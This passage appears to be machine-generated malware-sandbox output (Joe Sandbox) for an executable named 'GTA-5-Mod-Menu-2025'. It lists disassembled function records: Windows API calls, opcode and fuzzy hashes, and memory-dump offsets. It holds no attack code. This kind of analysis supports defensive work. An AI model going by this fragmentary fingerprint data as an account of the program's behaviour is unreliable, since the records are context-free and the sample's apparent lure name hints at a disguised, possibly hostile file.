                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                    • String ID:
                                                                    • API String ID: 1913693674-0
                                                                    • Opcode ID: 6f85fc8f5932b75ae6a67a07ea3930d0a76eeecb53b5eaa1e01ccae440ea86b5
                                                                    • Instruction ID: e0eec8eb89800de93fd39828cfc59094b0350c48782b5ca0a9c1aa83d29ea103
                                                                    • Opcode Fuzzy Hash: 6f85fc8f5932b75ae6a67a07ea3930d0a76eeecb53b5eaa1e01ccae440ea86b5
                                                                    • Instruction Fuzzy Hash: 9A21C871A00209EFBF10AF67ED8196BB7A9FF043657154428F819D7150DB34ED40A7A0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5ced1a7b8a919bc27145d7c81f21fdc9ef9a5527aa2a86eaa76612e3dac3d99b
                                                                    • Instruction ID: 85ad501fe76829fd42923ac86da5e1ed670a693b04234a59588ef19df9057b5f
                                                                    • Opcode Fuzzy Hash: 5ced1a7b8a919bc27145d7c81f21fdc9ef9a5527aa2a86eaa76612e3dac3d99b
                                                                    • Instruction Fuzzy Hash: 3C215E72A0020AAF9B24FF759C919AA77A9FF043647104525F91AD7650D738EC40A7F0
                                                                    APIs
                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 00F9C936
                                                                      • Part of subcall function 00F957C1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00F96F95,?,00000000,-00000008), ref: 00F95822
                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F9C96E
                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F9C98E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                    • String ID:
                                                                    • API String ID: 158306478-0
                                                                    • Opcode ID: ff3a5e6e9aed9148fdad7251598275df432e36680a94ae6e8fbb3ed8b733e06a
                                                                    • Instruction ID: 22f883ed6aac41a8d4fd915d244d43c97afd3ea3460bb2fcb5976f8b29e555f3
                                                                    • Opcode Fuzzy Hash: ff3a5e6e9aed9148fdad7251598275df432e36680a94ae6e8fbb3ed8b733e06a
                                                                    • Instruction Fuzzy Hash: AD1184F2901619BFBF1227B59C89C7F7EACDE867A47500525F906D1101FE289E00B6F5
                                                                    APIs
                                                                    • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,00FA399F,00000000,00000001,?,?,?,00F9DB00,?,00000000,00000000), ref: 00FA4467
                                                                    • GetLastError.KERNEL32(?,00FA399F,00000000,00000001,?,?,?,00F9DB00,?,00000000,00000000,?,?,?,00F9D446,?), ref: 00FA4473
                                                                      • Part of subcall function 00FA44D0: CloseHandle.KERNEL32(FFFFFFFE,00FA4483,?,00FA399F,00000000,00000001,?,?,?,00F9DB00,?,00000000,00000000,?,?), ref: 00FA44E0
                                                                    • ___initconout.LIBCMT ref: 00FA4483
                                                                      • Part of subcall function 00FA44A5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00FA4441,00FA398C,?,?,00F9DB00,?,00000000,00000000,?), ref: 00FA44B8
                                                                    • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,00FA399F,00000000,00000001,?,?,?,00F9DB00,?,00000000,00000000,?), ref: 00FA4498
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                    • String ID:
                                                                    • API String ID: 2744216297-0
                                                                    • Opcode ID: 52d5598eae1b06170174b5319b6b8c2e4e2f41a7b63479ba8ae684896df91151
                                                                    • Instruction ID: a56da8238d4c67e4c97c97fc0520322a046aabda7e583ee31901e962e1f3dbd7
                                                                    • Opcode Fuzzy Hash: 52d5598eae1b06170174b5319b6b8c2e4e2f41a7b63479ba8ae684896df91151
                                                                    • Instruction Fuzzy Hash: B0F0307640021CBFCF225F91EC48A9A3F26FB8E3B1F514020FE0896130C7729820BB90
                                                                    APIs
                                                                      • Part of subcall function 00F9590A: GetLastError.KERNEL32(00000000,?,00F97C8D), ref: 00F9590E
                                                                      • Part of subcall function 00F9590A: SetLastError.KERNEL32(00000000,?,?,00000028,00F91F53), ref: 00F959B0
                                                                    • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00F8F7C9,?,?,?,00000055,?,-00000050,?,?,?), ref: 00F9A1A5
                                                                    • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00F8F7C9,?,?,?,00000055,?,-00000050,?,?), ref: 00F9A1DC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$CodePageValid
                                                                    • String ID: utf8
                                                                    • API String ID: 943130320-905460609
                                                                    • Opcode ID: 570e29c9cc324a919aa2efa42e853d5bb62ee6bec9447f22304c7ac9d222a9e7
                                                                    • Instruction ID: fc779d9721de02147df9c86ccca348a8b832f2456aaf1e484bce7ab526278670
                                                                    • Opcode Fuzzy Hash: 570e29c9cc324a919aa2efa42e853d5bb62ee6bec9447f22304c7ac9d222a9e7
                                                                    • Instruction Fuzzy Hash: AB512871A00305AAFF29AB748C42FB673A8EF45720F140429F5559B181FB75D980BBE3
                                                                    APIs
                                                                    • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00F95031,?,?,00000000,00000000,00000000,?), ref: 00F95155
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: EncodePointer
                                                                    • String ID: MOC$RCC
                                                                    • API String ID: 2118026453-2084237596
                                                                    • Opcode ID: 15ba95f8a57b5a7b4b5c12a3eb192ee1216996a9392f1101337f04f80e8da9b0
                                                                    • Instruction ID: 15b4edef40b31ab67fafd0b017be3f3827c9f1472f3629d8044dee6645c1a279
                                                                    • Opcode Fuzzy Hash: 15ba95f8a57b5a7b4b5c12a3eb192ee1216996a9392f1101337f04f80e8da9b0
                                                                    • Instruction Fuzzy Hash: 44417931D00609AFEF16DF98DC81AEE7BB5FF48714F184069FA0567211D335A991EB50
                                                                    APIs
                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00F94C13
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: ___except_validate_context_record
                                                                    • String ID: csm$csm
                                                                    • API String ID: 3493665558-3733052814
                                                                    • Opcode ID: 8b4f7d858d5dc019287e76bcd60908bca01627e6996d013cddc0e698195dc029
                                                                    • Instruction ID: 301ca63cc9da68eba751d3467e0e8fd9d4a6b1bca96fe5e9c9a4ceb3024aa40d
                                                                    • Opcode Fuzzy Hash: 8b4f7d858d5dc019287e76bcd60908bca01627e6996d013cddc0e698195dc029
                                                                    • Instruction Fuzzy Hash: 8331CF76801218AFEF268F50DC44D6A7B65FF29325B18825AF8545A121C332ECA3FF91
                                                                    APIs
                                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,00F9AB2D,00000002,00000000,?,?,?,00F9AB2D,?,00000000), ref: 00F9B210
                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,00F9AB2D,00000002,00000000,?,?,?,00F9AB2D,?,00000000), ref: 00F9B239
                                                                    • GetACP.KERNEL32(?,?,00F9AB2D,?,00000000), ref: 00F9B24E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale
                                                                    • String ID: ACP$OCP
                                                                    • API String ID: 2299586839-711371036
                                                                    • Opcode ID: 83ce1b187351f555520f7ed8a2d5b7d489f80fe1e6b4fd7eeec91ccd592a8201
                                                                    • Instruction ID: 9203ef6fc9630091ae59231822bb246e077fe8d5dff5f75cc10b9de42de5c01d
                                                                    • Opcode Fuzzy Hash: 83ce1b187351f555520f7ed8a2d5b7d489f80fe1e6b4fd7eeec91ccd592a8201
                                                                    • Instruction Fuzzy Hash: ED21D622E04100A6FF358F55EA00BAB73A7EF90B30B564424E90AD7104E732DD80F350
                                                                    APIs
                                                                      • Part of subcall function 00F9590A: GetLastError.KERNEL32(00000000,?,00F97C8D), ref: 00F9590E
                                                                      • Part of subcall function 00F9590A: SetLastError.KERNEL32(00000000,?,?,00000028,00F91F53), ref: 00F959B0
                                                                    • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00F9AAFF
                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 00F9AB3D
                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 00F9AB50
                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00F9AB98
                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00F9ABB3
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                    • String ID:
                                                                    • API String ID: 415426439-0
                                                                    • Opcode ID: d96bd4a143244115fde5f5f8bdc145e5ecff8f360c565f920c7763ac8d9a33f0
                                                                    • Instruction ID: 87f2566d22180582d4e9b9397b96ef545291b36812a556565798de6efd7a2706
                                                                    • Opcode Fuzzy Hash: d96bd4a143244115fde5f5f8bdc145e5ecff8f360c565f920c7763ac8d9a33f0
                                                                    • Instruction Fuzzy Hash: 755180B2E00219ABFF14DFA4CC85AAA73B9FF44710F144465E911E7190E774DA44EBA2
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
                                                                    • Instruction ID: a0f2cbffd4b291ccbac7c0b20493b91d22184ccd65307a441dcd2bc566bb258b
                                                                    • Opcode Fuzzy Hash: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
                                                                    • Instruction Fuzzy Hash: C0021DB1E012199BEF14CFA9C9806AEB7F1FF48324F258269E519E7341D731AE41DB90
                                                                    APIs
                                                                    • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F9B849
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: FileFindFirst
                                                                    • String ID:
                                                                    • API String ID: 1974802433-0
                                                                    • Opcode ID: 204bcad8e864d67479c4a1b42e46905535ecdae3f112ec2e005526035e935b2c
                                                                    • Instruction ID: f480687b8eecaea44ac7f4016663f439985fa210b6d0a42a61e1c3fc9f68d6b3
                                                                    • Opcode Fuzzy Hash: 204bcad8e864d67479c4a1b42e46905535ecdae3f112ec2e005526035e935b2c
                                                                    • Instruction Fuzzy Hash: F971F3B1D0516C5FEF21AF68ED99AAAB7B8EF45310F5442D9E00893211DB358E84AF10
                                                                    APIs
                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00F89A3F
                                                                    • IsDebuggerPresent.KERNEL32 ref: 00F89B0B
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F89B24
                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00F89B2E
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                    • String ID:
                                                                    • API String ID: 254469556-0
                                                                    • Opcode ID: 785eddcaef46b5fc0c8c24b67b55e99e8571f7228d8008e12892e50d5dba098e
                                                                    • Instruction ID: 7e6580cbea56c330b3bf21ad066cd137d0fb22212a913af97cadc37d97eeed3a
                                                                    • Opcode Fuzzy Hash: 785eddcaef46b5fc0c8c24b67b55e99e8571f7228d8008e12892e50d5dba098e
                                                                    • Instruction Fuzzy Hash: E231F9B5D0521D9BDB61EF64DD497CDBBB8AF08300F1041AAE40CAB250E7B49A849F45
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: AddressCloseFileHandleProcSize
                                                                    • String ID: CreateFileA
                                                                    • API String ID: 2836222988-1429953656
                                                                    • Opcode ID: 8b8a758aaafe803d3057e0e932a3bed6317a12aee16b5af2f69458797472e9b0
                                                                    • Instruction ID: 852fbb8ee6ba40f2327faa3b6b20eeeb886fb59715bb8ffa4edb3fe3267f904e
                                                                    • Opcode Fuzzy Hash: 8b8a758aaafe803d3057e0e932a3bed6317a12aee16b5af2f69458797472e9b0
                                                                    • Instruction Fuzzy Hash: EF41A5B1D082099FCB00EFA8D49879EBBF0BF49314F008529E899A7350D7789945DF92
                                                                    APIs
                                                                    • GetCPInfo.KERNEL32(00000000,00000000,00000000,7FFFFFFF,?,00FA417D,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 00FA4238
                                                                    • __alloca_probe_16.LIBCMT ref: 00FA42F3
                                                                    • __alloca_probe_16.LIBCMT ref: 00FA4382
                                                                    • __freea.LIBCMT ref: 00FA43CD
                                                                    • __freea.LIBCMT ref: 00FA43D3
                                                                    • __freea.LIBCMT ref: 00FA4409
                                                                    • __freea.LIBCMT ref: 00FA440F
                                                                    • __freea.LIBCMT ref: 00FA441F
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: __freea$__alloca_probe_16$Info
                                                                    • String ID:
                                                                    • API String ID: 127012223-0
                                                                    • Opcode ID: 470fba1de211c3fd6291227bb96b0349e61853677a398423f39d4994ca3680a3
                                                                    • Instruction ID: 7d5ed09f621ddf01f2c461627fdd4c1691ca26db63c999399dfc9e8222e6835d
                                                                    • Opcode Fuzzy Hash: 470fba1de211c3fd6291227bb96b0349e61853677a398423f39d4994ca3680a3
                                                                    • Instruction Fuzzy Hash: 3B7184B2D042099BDF21AE948C81BAE77F59F8B720F280059FD04A7281D7F5AC41B760
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: _strrchr
                                                                    • String ID:
                                                                    • API String ID: 3213747228-0
                                                                    • Opcode ID: b258c23f8f5adf4b5b829db56bad2fb8a7efe0f2db3ca2ba46b92337591bc9f9
                                                                    • Instruction ID: 6f67d6a2429b463f6e75f03fba0b3a9068bfac505b5086a5cc38bdd6ebe5b726
                                                                    • Opcode Fuzzy Hash: b258c23f8f5adf4b5b829db56bad2fb8a7efe0f2db3ca2ba46b92337591bc9f9
                                                                    • Instruction Fuzzy Hash: 5AB17972D003959FFF118F64CC81BAE7BA5EF563A0F284155E904AF282DA78DC02D7A1
                                                                    APIs
                                                                    • _ValidateLocalCookies.LIBCMT ref: 00F8ABA7
                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00F8ABAF
                                                                    • _ValidateLocalCookies.LIBCMT ref: 00F8AC38
                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00F8AC63
                                                                    • _ValidateLocalCookies.LIBCMT ref: 00F8ACB8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                    • String ID: csm
                                                                    • API String ID: 1170836740-1018135373
                                                                    • Opcode ID: edf93fba279839227daa040a9b069bd2020f08c679034ffdb873340300774f03
                                                                    • Instruction ID: d5b55b0b8cb1552bb51935a115e20e61b6a0fea8e574afa80352531ecc35bdf4
                                                                    • Opcode Fuzzy Hash: edf93fba279839227daa040a9b069bd2020f08c679034ffdb873340300774f03
                                                                    • Instruction Fuzzy Hash: A541E434E006189BDF11EF68CC80ADEBBA5FF46324F148156E8159B352D739EA01EF92
                                                                    APIs
                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,BB40E64E,?,00F96711,00000000,00000000,00000000,00000000), ref: 00F966C3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
